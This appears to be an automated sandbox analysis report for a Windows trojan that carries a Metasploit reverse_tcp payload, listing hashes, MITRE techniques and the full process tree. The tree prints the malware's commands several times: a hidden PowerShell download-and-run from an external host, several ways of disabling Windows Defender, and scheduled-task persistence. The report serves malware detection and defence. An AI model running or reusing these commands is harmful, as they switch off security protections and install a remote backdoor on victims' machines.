Overview

overview

10

Static

static

3

db9756031d...ly.exe

windows7-x64

10

db9756031d...ly.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-12-2024 08:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe

  • Size

    126KB

  • MD5

    7176b040816932541eb9c2b91d90b29b

  • SHA1

    137a9c4620366caff2a1d1c297b6ae8c6d28761d

  • SHA256

    db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95

  • SHA512

    1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de

  • SSDEEP

    3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn

Score
10/10
metasploitbackdoordiscoveryevasionexecutiontrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

147.185.221.23:1121

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Metasploit family
    metasploit
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    evasiontrojan
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 3 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
    "C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1384
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8E36.tmp\8E37.tmp\8E38.bat C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1596
      • C:\Users\Admin\AppData\Local\Temp\reddit.exe
        "C:\Users\Admin\AppData\Local\Temp\reddit.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3012
      • C:\Windows\system32\attrib.exe
        attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
        3⤵
        • Views/modifies file attributes
        PID:724
      • C:\Windows\system32\schtasks.exe
        schtasks /query /TN "RunRedditLogon"
        3⤵
          PID:4940
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "RunRedditLogon" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe" /sc onlogon /rl highest /f
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4688
        • C:\Windows\system32\schtasks.exe
          schtasks /query /TN "RunRedditMinute"
          3⤵
            PID:3048
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn "RunRedditMinute" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe" /sc minute /mo 1 /rl highest /f
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1264
          • C:\Windows\system32\sc.exe
            sc config WinDefend start= disabled
            3⤵
            • Launches sc.exe
            PID:1772
          • C:\Windows\system32\net.exe
            net stop WinDefend
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1128
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop WinDefend
              4⤵
                PID:2888
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
              3⤵
                PID:4224
              • C:\Windows\system32\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:2352
          • C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
            C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
            1⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2284
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4457.tmp\4458.tmp\4459.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1348
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1716
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5032
              • C:\Users\Admin\AppData\Local\Temp\reddit.exe
                "C:\Users\Admin\AppData\Local\Temp\reddit.exe"
                3⤵
                • Executes dropped EXE
                PID:1688
              • C:\Windows\system32\attrib.exe
                attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
                3⤵
                • Views/modifies file attributes
                PID:2152
              • C:\Windows\system32\schtasks.exe
                schtasks /query /TN "RunRedditLogon"
                3⤵
                  PID:4200
                • C:\Windows\system32\schtasks.exe
                  schtasks /query /TN "RunRedditMinute"
                  3⤵
                    PID:4276
                  • C:\Windows\system32\sc.exe
                    sc config WinDefend start= disabled
                    3⤵
                    • Launches sc.exe
                    PID:396
                  • C:\Windows\system32\net.exe
                    net stop WinDefend
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1504
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop WinDefend
                      4⤵
                        PID:652
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                      3⤵
                        PID:2860
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                        3⤵
                        • Modifies Windows Defender Real-time Protection settings
                        PID:3572
                  • C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
                    C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
                    1⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:2280
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2ACF.tmp\2AD0.tmp\2AD1.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:404
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5116
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3440
                      • C:\Users\Admin\AppData\Local\Temp\reddit.exe
                        "C:\Users\Admin\AppData\Local\Temp\reddit.exe"
                        3⤵
                        • Executes dropped EXE
                        PID:4128
                      • C:\Windows\system32\attrib.exe
                        attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe"
                        3⤵
                        • Views/modifies file attributes
                        PID:2148
                      • C:\Windows\system32\schtasks.exe
                        schtasks /query /TN "RunRedditLogon"
                        3⤵
                          PID:4360
                        • C:\Windows\system32\schtasks.exe
                          schtasks /query /TN "RunRedditMinute"
                          3⤵
                            PID:332
                          • C:\Windows\system32\sc.exe
                            sc config WinDefend start= disabled
                            3⤵
                            • Launches sc.exe
                            PID:4324
                          • C:\Windows\system32\net.exe
                            net stop WinDefend
                            3⤵
                              PID:2328
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 stop WinDefend
                                4⤵
                                  PID:860
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:1544
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                  3⤵
                                  • Modifies Windows Defender Real-time Protection settings
                                  PID:1392

                            Network

                            MITRE ATT&CK Enterprise v15

                            Reconnaissance

                            Resource Development

                            Initial Access

                            Execution

                            Command and Scripting Interpreter

                            1
                            T1059

                            PowerShell

                            1
                            T1059.001

                            Scheduled Task/Job

                            1
                            T1053

                            Scheduled Task

                            1
                            T1053.005

                            System Services

                            1
                            T1569

                            Service Execution

                            1
                            T1569.002

                            Persistence

                            Create or Modify System Process

                            2
                            T1543

                            Windows Service

                            2
                            T1543.003

                            Scheduled Task/Job

                            1
                            T1053

                            Scheduled Task

                            1
                            T1053.005

                            Privilege Escalation

                            Create or Modify System Process

                            2
                            T1543

                            Windows Service

                            2
                            T1543.003

                            Scheduled Task/Job

                            1
                            T1053

                            Scheduled Task

                            1
                            T1053.005

                            Defense Evasion

                            Hide Artifacts

                            1
                            T1564

                            Hidden Files and Directories

                            1
                            T1564.001

                            Impair Defenses

                            1
                            T1562

                            Disable or Modify Tools

                            1
                            T1562.001

                            Modify Registry

                            1
                            T1112

                            Credential Access

                            Discovery

                            Query Registry

                            2
                            T1012

                            System Information Discovery

                            2
                            T1082

                            System Location Discovery

                            1
                            T1614

                            System Language Discovery

                            1
                            T1614.001

                            Lateral Movement

                            Collection

                            Command and Control

                            Exfiltration

                            Impact

                            Service Stop

                            1
                            T1489

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                              Filesize

                              2KB

                              MD5

                              d85ba6ff808d9e5444a4b369f5bc2730

                              SHA1

                              31aa9d96590fff6981b315e0b391b575e4c0804a

                              SHA256

                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                              SHA512

                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              944B

                              MD5

                              6d3e9c29fe44e90aae6ed30ccf799ca8

                              SHA1

                              c7974ef72264bbdf13a2793ccf1aed11bc565dce

                              SHA256

                              2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                              SHA512

                              60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              1KB

                              MD5

                              8563f3330e225c8acd3d9ccbb3a0cf88

                              SHA1

                              25c17a1dbf116a256fcae066ffa26aecc353fa79

                              SHA256

                              532d7be532060b508f4510b0c22c23af942aba53a6242474339464fd0b6e9c97

                              SHA512

                              0efffa142a3a4ef70a3c21ae0f952e3ef6db81cc4a1bacb5b7bac23fa3e5cdf6574df3b7b2a4047b43be9c588884b7f3d945e01859d9009de0c45033e1da8dd6

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              944B

                              MD5

                              f427c5cd94e76ea1dca22df019171e21

                              SHA1

                              e68ffa1fb0063a00ea7a087c949c1282ced1d496

                              SHA256

                              29b3991838f0692860776730238e074e2b3f5214dc15076f5e7e8199c8aa83d2

                              SHA512

                              bb78a5554bbc7cbedea1aceabdf19432500e83762a77837f0f7e94ca29bc1fbe8a5a863d265b8084c334b24b71b536ec402cb2833291078ce7b6342e9d1fb504

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              1KB

                              MD5

                              a8f42132448772feab8f5c2356db61f5

                              SHA1

                              8e66cadc6b4ae400199f5ee411cd3e437ad83017

                              SHA256

                              4e25f252b012c701f292191c7095564583f916c2da99e8d98bc5d387c4e17c3f

                              SHA512

                              be593895cd67f42038748d5bff3e3d237c4b1740b9a9862522cdaf7c0c6980cd10510bf46914192d8db9d2c5ca1f5d34eb762cf31b4dd9c25e6d82c0a810bc9a

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              944B

                              MD5

                              a66904fe28a9c28446e44f44e5ba034b

                              SHA1

                              d4277226b3b95b2f92dc745bda7096a98d4a9f26

                              SHA256

                              eb82b392f4cc90f4bb62e8d5d779a23ee0aa67832dcc8af94ce6099dd6cef8a7

                              SHA512

                              a873699317c8905a3171985b04f9aa15993224bf18dad3233254229e04deec7232eb9effa1f6f17a9ad525d33a65cc7bb0000d899c2ebcc8ab312be6d01081a1

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\8E36.tmp\8E37.tmp\8E38.bat
                              Filesize

                              2KB

                              MD5

                              c0e9bc2dfff6e08df8196809b9bbf253

                              SHA1

                              006e88ea359145c40a6bbca55e6f21b387999255

                              SHA256

                              43c1dfafac6c340f420057606f317c2d0d3182c04f1a9c76b782f818c85f4f11

                              SHA512

                              5b0c012aca5479bf3b8852e1504465ccb2ad6ce4134ee8d2ad57c898fd91ac19f96a669ebc3a9201e65099ed1723f4515b48ca25ea21681ad45377ce3d9ca60c

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nrhyxre4.54m.ps1
                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\reddit.exe
                              Filesize

                              72KB

                              MD5

                              23544090c6d379e3eca7343c4f05d4d2

                              SHA1

                              c9250e363790a573e9921a68b7abe64f27e63df1

                              SHA256

                              b439d22ed2c1e1f83f3c52d1a7307d9aee8b516166ab221cb6d67b188cd80f56

                              SHA512

                              6aca78b0653e87ac80d7f562e6ab6d650f4d53d375cad043eb9613c7bbd642f7f82564a872b1b05520a77acbeba9da0540c4cd5a855a28a8188ebe3a4b57775c

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95_Sigmanly.exe
                              Filesize

                              126KB

                              MD5

                              7176b040816932541eb9c2b91d90b29b

                              SHA1

                              137a9c4620366caff2a1d1c297b6ae8c6d28761d

                              SHA256

                              db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95

                              SHA512

                              1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de

                              Download Submit

                            • memory/3552-17-0x00007FFD8D670000-0x00007FFD8E131000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/3552-14-0x00007FFD8D670000-0x00007FFD8E131000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/3552-13-0x00007FFD8D670000-0x00007FFD8E131000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/3552-3-0x000001D5736A0000-0x000001D5736C2000-memory.dmp

                              Filesize

                              136KB

                              Download

                            • memory/3552-2-0x00007FFD8D673000-0x00007FFD8D675000-memory.dmp

                              Filesize

                              8KB

                              Download